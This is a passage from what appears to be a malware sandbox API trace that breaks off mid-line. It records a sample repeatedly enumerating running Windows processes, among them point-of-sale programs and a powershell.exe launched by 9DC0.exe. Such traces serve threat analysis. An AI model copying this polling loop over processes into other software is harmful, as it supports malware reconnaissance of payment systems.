th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0221.614] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0221.616] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0221.618] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0221.619] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0221.660] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0221.661] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0221.663] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0221.667] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0221.668] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0221.670] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0221.672] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.673] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0221.675] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0221.677] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.679] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.680] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0221.682] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0221.683] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0221.685] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.737] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0221.739] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0221.741] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0221.743] CloseHandle (hObject=0x1eb8) returned 1 [0221.743] Sleep (dwMilliseconds=0x64) [0221.780] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0221.796] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.798] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.799] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.801] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.805] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.807] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.808] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.810] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.845] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.847] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.849] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.852] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.854] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.856] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.859] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.861] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.865] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.867] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.869] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.871] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.874] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0221.877] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.881] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0221.934] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.936] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0221.937] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0221.939] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0221.940] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0221.942] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.944] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0221.946] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.947] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.949] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0221.950] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.951] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0221.953] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.954] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0221.960] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0221.962] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0221.963] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0221.965] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0221.966] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0221.969] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0221.971] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0222.011] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0222.014] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0222.016] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0222.018] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0222.020] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0222.021] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0222.023] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0222.025] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0222.026] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0222.028] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0222.029] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0222.031] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0222.032] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0222.034] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0222.036] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, 